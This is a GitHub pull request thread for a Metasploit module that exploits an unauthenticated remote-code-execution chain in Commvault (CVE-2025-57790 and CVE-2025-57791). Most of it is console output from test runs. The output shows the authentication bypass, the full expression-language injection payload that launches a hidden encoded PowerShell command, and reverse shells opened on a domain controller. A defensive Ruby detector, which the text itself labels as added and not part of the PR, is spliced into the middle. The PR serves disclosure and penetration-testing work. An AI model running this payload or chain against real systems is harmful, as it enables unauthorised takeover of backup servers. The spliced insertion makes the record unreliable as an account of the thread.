@remmons-r7 remmons-r7 commented Sep 2, 2025

This module exploits an unauthenticated remote code execution exploit chain for Commvault, tracked as CVE-2025-57790 and CVE-2025-57791. A command-line injection permits unauthenticated access to the 'localadmin' account, which then facilitates code execution via expression language injection. CVE-2025-57788 is also leveraged to leak the target host name, which is necessary knowledge to exploit the remote code execution chain. This module executes in the context of 'NETWORK SERVICE' on Windows.

Verification

  1. Start msfconsole
  2. use exploit/windows/http/commvault_rce_cve_2025_57790_cve_2025_57791
  3. set RHOSTS <TARGET_IP_ADDRESS>
  4. set RPORT <TARGET_PORT>
  5. run

Example usage

msf exploit(windows/http/commvault_rce_cve_2025_57790_cve_2025_57791) > show options 

Module options (exploit/windows/http/commvault_rce_cve_2025_57790_cve_2025_57791):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, socks5h, http, sapni, socks4
   RHOSTS     192.168.154.173  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      443              yes       The target port (TCP)
   SSL        true             yes       Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to Commvault
   VHOST                       no        HTTP server virtual host


Payload options (cmd/windows/powershell_reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   LHOST         192.168.154.139  yes       The listen address (an interface may be specified)
   LOAD_MODULES                   no        A list of powershell modules separated by a comma to download over the web
   LPORT         4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Default



View the full module info with the info, or info -d command.

msf exploit(windows/http/commvault_rce_cve_2025_57790_cve_2025_57791) > set VERBOSE true
VERBOSE => true
msf exploit(windows/http/commvault_rce_cve_2025_57790_cve_2025_57791) > check
[*] Attempting to query the publicLink.do endpoint
[*] The server returned a body that included the string cv-gorkha, looks like Commvault
[+] Fetched GUID: 572131A8-3182-4423-8850-4A62D6CA2178
[*] Attempting to login as PublicSharingUser
[+] Authenticated as PublicSharingUser, got token: QSDK 34bf02a14954ba56882d9614fb3dfb8d81f8c9f6ae1b180cf7008674f44701dd6e12073182cd57fe736b0dd023e8985feba3ad28fc0d509c6364fe553ddc09ffc05beeeebf0b041baed00d5927ada3d14902085942e84952538dfcee2e69539c76f6e388d8b7ad5c672eab2383f6fbe7760a3061d4b7515ff5320b6169935d239cf9322fa09e0107f0ad5750cf7dfa9eec22e5ff5e46e2e6706ba765cf8b6e059d03e1fd6a86ef6ba50ba229f6217b64a35815a82b2c63347c913d5e66945273ed4d3fcc73dd0a03a119592168550be06
[+] 192.168.154.173:443 - The target is vulnerable. Successfully authenticated as PublicSharingUser
msf exploit(windows/http/commvault_rce_cve_2025_57790_cve_2025_57791) > run
[*] Started reverse TCP handler on 192.168.154.139:4444 
[!] AutoCheck is disabled, proceeding with exploitation
[*] Attempting to query the publicLink.do endpoint
[*] The server returned a body that included the string cv-gorkha, looks like Commvault
[+] Fetched GUID: 572131A8-3182-4423-8850-4A62D6CA2178
[*] Attempting PublicServiceUser login using: 572131A8-3182-4423-8850-4A62D6CA2178
[+] Authenticated as PublicSharingUser, got token: QSDK 3d68d1d2b797e29d96dced010003dc2b8b30c298d87bd24754009afe40bb38921cf7f2e800a4cc43b5c3bda15b06e1a563225a4e08fb4814847ea8f601e9ac6a2405082bf37bcc3d87f493800359c0e0d340b3b12f464b6f1a12756ac218b3e6dc34ebe589b9aca40351512a50d421c9901ebc3952db9c798a3a2d17b94642a7c47861eadd1737666aea2ef49ae62d70efe080f1d6e879bce0dd3dd56cb4f233867a3fa314f192ceb380a5bacefd715ba4e90c4e0a53461ba041c68f183ba771640151f24a508e4ceca6387cec475dd84
[*] Attempting to query authenticated API endpoint to get host name and OS
[+] Got target host name: DC01
[+] Got target host OS: Windows
[*] Attempting to mint a localadmin token using hostname: DC01
[+] Successfully bypassed authentication
[*] Admin token: QSDK 3ec7146da31ce17e7698106e52c813be5d188db27103adf8595059b31935fbe6c1750ca468c2bc02cf514093cb4196f56fd5197bd84c5ca966b803d3b556a2b69be08dae5d4ac3bc7a4e967e2cf94263bb6ce11f4eb02b3f4b70943de18cdd7f21e119493ba98c87bb396f5484f9cd3b08ccbfef3a06b9dc38e20cb7904d4bdd59ea09f6d084c56d2269d0a6a8a4ad96b7c33a2ad18fe1978839494db8b6d6c87205fadab0466cafee879299154c1a40f573d026762c1084c8c65cba0a56efccf3dfe38adc2fb38e09b5c8cfbc22527d13ce872d80b8e3984f89b6e2efd3972384b77d23706264c33c63428ddcea4b9eea8054153c39ab867
[*] Extracted localadmin user ID number: 4
[*] Got JSON response, searching for installation path disclosures
[+] Leaked the installation path: C:\Program Files\Commvault\ContentStore
[*] Uploading XML file: <App_GetUserPropertiesRequest level="30">
	<user userName="DC01_localadmin__" /></App_GetUserPropertiesRequest>
[*] Updating user description: <App_UpdateUserPropertiesRequest><users><AppMsg.UserInfo><userEntity><userId>4</userId></userEntity><description>${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('powershell -w hidden -nop -e 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').getInputStream()).useDelimiter('%5C%5CA').next()}</description></AppMsg.UserInfo></users></App_UpdateUserPropertiesRequest>
[*] Powershell session session 1 opened (192.168.154.139:4444 -> 192.168.154.173:50327) at 2025-09-05 22:51:42 -0500
^C
[-] run: Interrupted
msf exploit(windows/http/commvault_rce_cve_2025_57790_cve_2025_57791) > sessions -i 1
[*] Starting interaction with 1...

PS C:\Program Files\Commvault\ContentStore\Apache\bin> whoami
nt authority\network service

I will share a packet capture of the exploit running successfully with the Metasploit team. Thank you!
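
A defender-side check for the final stage shown in the output above, as an added example that is not part of the pull request or the module: it flags `App_UpdateUserPropertiesRequest` bodies whose `<description>` carries an expression-language expression. It assumes request bodies are available from a reverse proxy or WAF log; the function names, marker list and severity levels are hypothetical.

```ruby
# Added detection example, not part of the pull request. Request shape follows
# the "Updating user description" output above; names and scoring are assumptions.
EL_OPEN = /[$#]\{/
MARKERS = ['getClass', 'forName', 'java.lang.Runtime', 'getRuntime',
           'ProcessBuilder', '.exec('].freeze

# Turn a numeric character reference into text; invalid code points become "?".
def codepoint(num)
  [num].pack('U').scrub('?')
end

# Decode XML entities so an encoded "$" or "{" cannot hide the expression.
def decode_entities(text)
  text.gsub(/&#x(\h{1,6});/) { codepoint(Regexp.last_match(1).hex) }
      .gsub(/&#(\d{1,7});/) { codepoint(Regexp.last_match(1).to_i) }
      .gsub('&lt;', '<').gsub('&gt;', '>')
      .gsub('&quot;', '"').gsub('&apos;', "'").gsub('&amp;', '&')
end

# Returns one finding per <AppMsg.UserInfo> whose description contains EL syntax.
# Regex extraction is used on purpose: hostile bodies are often not well-formed XML.
def inspect_user_update(body)
  return [] unless body.include?('App_UpdateUserPropertiesRequest')

  blocks = body.scan(%r{<AppMsg\.UserInfo>(.*?)</AppMsg\.UserInfo>}m).flatten
  blocks.filter_map do |info|
    desc = info[%r{<description>(.*?)</description>}m, 1]
    next if desc.nil?

    decoded = decode_entities(desc)
    next unless decoded.match?(EL_OPEN)

    hits = MARKERS.select { |m| decoded.include?(m) }
    { user_id: info[%r{<userId>(\d+)</userId>}, 1],
      severity: hits.empty? ? :review : :high, markers: hits }
  end
end

# Builds a constructed sample request (not captured traffic).
def sample(user_id, description)
  '<App_UpdateUserPropertiesRequest><users><AppMsg.UserInfo><userEntity>' \
    "<userId>#{user_id}</userId></userEntity><description>#{description}" \
    '</description></AppMsg.UserInfo></users></App_UpdateUserPropertiesRequest>'
end

p inspect_user_update(sample(4, %q[${''.getClass().forName('java.lang.Runtime')}]))
```

A `:review` finding means EL delimiters with no reflection markers; a description field has no legitimate reason to contain either, so both levels are worth alerting on.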

@bwatters-r7

@remmons-r7 did you mean to open this as a draft PR?

@remmons-r7 remmons-r7 marked this pull request as draft September 3, 2025 13:16
@remmons-r7 remmons-r7 marked this pull request as ready for review September 6, 2025 04:21
@jheysel-r7 jheysel-r7 self-assigned this Sep 10, 2025
@jheysel-r7 jheysel-r7 added module docs rn-modules release notes for new or majorly enhanced modules labels Sep 10, 2025

@jheysel-r7 jheysel-r7 left a comment

Awesome work @remmons-r7! Just a couple minor comments.

Testing

CommVault 11.36.49 running on a Windows 2019 Domain Controller

msf exploit(windows/http/commvault_rce_cve_2025_57790_cve_2025_57791) > rexploit 
[*] Reloading module...
[*] Started reverse TCP handler on 172.16.199.130:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to query the publicLink.do endpoint
[*] The server returned a body that included the string cv-gorkha, looks like Commvault
[+] Fetched GUID: 0B7A7F72-D613-4175-B199-A4806D17606A
[*] Attempting to login as PublicSharingUser
[+] Authenticated as PublicSharingUser, got token: QSDK 3968ad31e42d03a9fbe1cee06c1ff92f87718343c04d7fe601cb9ce8787c1ee6566eb70e1226455619bd79d7dc7452fba352f5208401a210f5bd4e3cb235eff265ef469f7be413e0812d776724b83751f08950c2f1e064286f7be0d6542003a3dbf5883d0750f474f53284e135510e0ae939f82be4bb5fd4ea73d086cd773f9eb37e03e372ceddc37b9673e29bbbd30ef43ef2e51826d92105a4618918325dd3fc8657078febc62c4ec386e59a4218e89470a088b231e37b2f8b04d98a676003385689504c853f3fd076e1739a8d7afb05c8b25ef9fa250d58e39eb5db069fbfc
[+] The target is vulnerable. Successfully authenticated as PublicSharingUser
[*] Attempting to query the publicLink.do endpoint
[*] The server returned a body that included the string cv-gorkha, looks like Commvault
[+] Fetched GUID: 0B7A7F72-D613-4175-B199-A4806D17606A
[*] Attempting PublicServiceUser login using: 0B7A7F72-D613-4175-B199-A4806D17606A
[+] Authenticated as PublicSharingUser, got token: QSDK 3901f9b43d5b2c92594089b546dc310b86b14a4a84323b55b108c5f24ee84545ff9204cb7ca9b415139eebd438a638cc94ec2b4f5d1c876a1601fcf2956b1b9b413d189e809f58e0e7c65a26df4be9550b96bac13be1c5b10cd98208e390af91cb10dcfc56b967a8bdfd67a6b470826ca72474e8e651ecaba0a58ab49c1bf1137fea9bd5750294e2a00c5b01d8b46ccb7a7f480dcab159455323e9b92e5b3a6a9c32522bfa6c8e996be64df7551053875a04e0b4a548afa894f91a5e1089bc13f010dc83d85f0b9a6cd5261d37083266e743479b7f2928843fdbcccb16f79e090
[*] Attempting to query authenticated API endpoint to get host name and OS
[+] Got target host name: dc2
[+] Got target host OS: Windows
[*] Attempting to mint a localadmin token using hostname: dc2
[+] Successfully bypassed authentication
[*] Admin token: QSDK 35a671e08b691eb9397bf67533d04f194a7e973f8f481adfc9a15583872d9e55893ea3c3a15158c3abfe5997d6303421feb5ac2d178a503ce2cb5e6b19f3aec3d89053502ac899021305eea1db987a8aab0e38923a9e8b9c61dee4c6323ab2da782867ad1a6350ecaf1be19b66da196e2661644472617a47344394345e74acbada3bd9f346b599dbb4adbd01db62c226dffacb65054302861afa2772ab4c1cca210ae11d28ae6211e14df54df8d4d2102a72ac8b0c1be62a5228ca7fee234359fd034e9209fd0ee9fb0cac59fc76d7fac13cdea218c090de2511acccf634b43713b7884f3f64a82fbfd2315e1b31c6d8d9bd63f341d3d6f27
[*] Extracted localadmin user ID number: 4
[*] Got JSON response, searching for installation path disclosures
[+] Leaked the installation path: C:\Program Files\Commvault\ContentStore
[*] Uploading XML file: <App_GetUserPropertiesRequest level="30">
        <user userName="dc2_localadmin__" /></App_GetUserPropertiesRequest>
[*] Updating user description: <App_UpdateUserPropertiesRequest><users><AppMsg.UserInfo><userEntity><userId>4</userId></userEntity><description>${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('powershell -w hidden -nop -e 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').getInputStream()).useDelimiter('%5C%5CA').next()}</description></AppMsg.UserInfo></users></App_UpdateUserPropertiesRequest>
[*] Powershell session session 1 opened (172.16.199.130:4444 -> 172.16.199.200:63620) at 2025-09-11 14:47:22 -0700

^C[-] Exploit failed [user-interrupt]: Interrupt 
[-] rexploit: Interrupted
msf exploit(windows/http/commvault_rce_cve_2025_57790_cve_2025_57791) > sessions -l

Active sessions
===============

  Id  Name  Type                Information  Connection
  --  ----  ----                -----------  ----------
  1         powershell windows  DC2$ @ DC2   172.16.199.130:4444 -> 172.16.199.200:63620 (172.16.199.200)

msf exploit(windows/http/commvault_rce_cve_2025_57790_cve_2025_57791) > sessions -i -1
[*] Starting interaction with 1...

PS C:\Program Files\Commvault\ContentStore\Apache\bin> whoami
nt authority\network service
PS C:\Program Files\Commvault\ContentStore\Apache\bin> systeminfo

Host Name:                 DC2
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00429-00000-00001-AA815
Original Install Date:     11/20/2023, 2:17:39 PM
System Boot Time:          9/11/2025, 1:54:25 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 158 Stepping 10 GenuineIntel ~2592 Mhz
                           [02]: Intel64 Family 6 Model 158 Stepping 10 GenuineIntel ~2592 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.24006586.B64.2406042151, 6/4/2024
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     16,383 MB
Available Physical Memory: 4,530 MB
Virtual Memory: Max Size:  18,815 MB
Virtual Memory: Available: 5,883 MB
Virtual Memory: In Use:    12,932 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    kerberos.issue
Logon Server:              N/A
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB4486153
                           [02]: KB4464455
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 172.16.199.200
                                 [02]: fe80::f929:8ca6:c03d:7842
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
PS C:\Program Files\Commvault\ContentStore\Apache\bin> 

Implementing commvault_rce_cve_2025_57790_cve_2025_57791.rb changes from peer review.
Remove a commented out line that isn't needed.
Remove an empty line that msftidy doesn't like
Update the example usage terminal output to reflect module changes.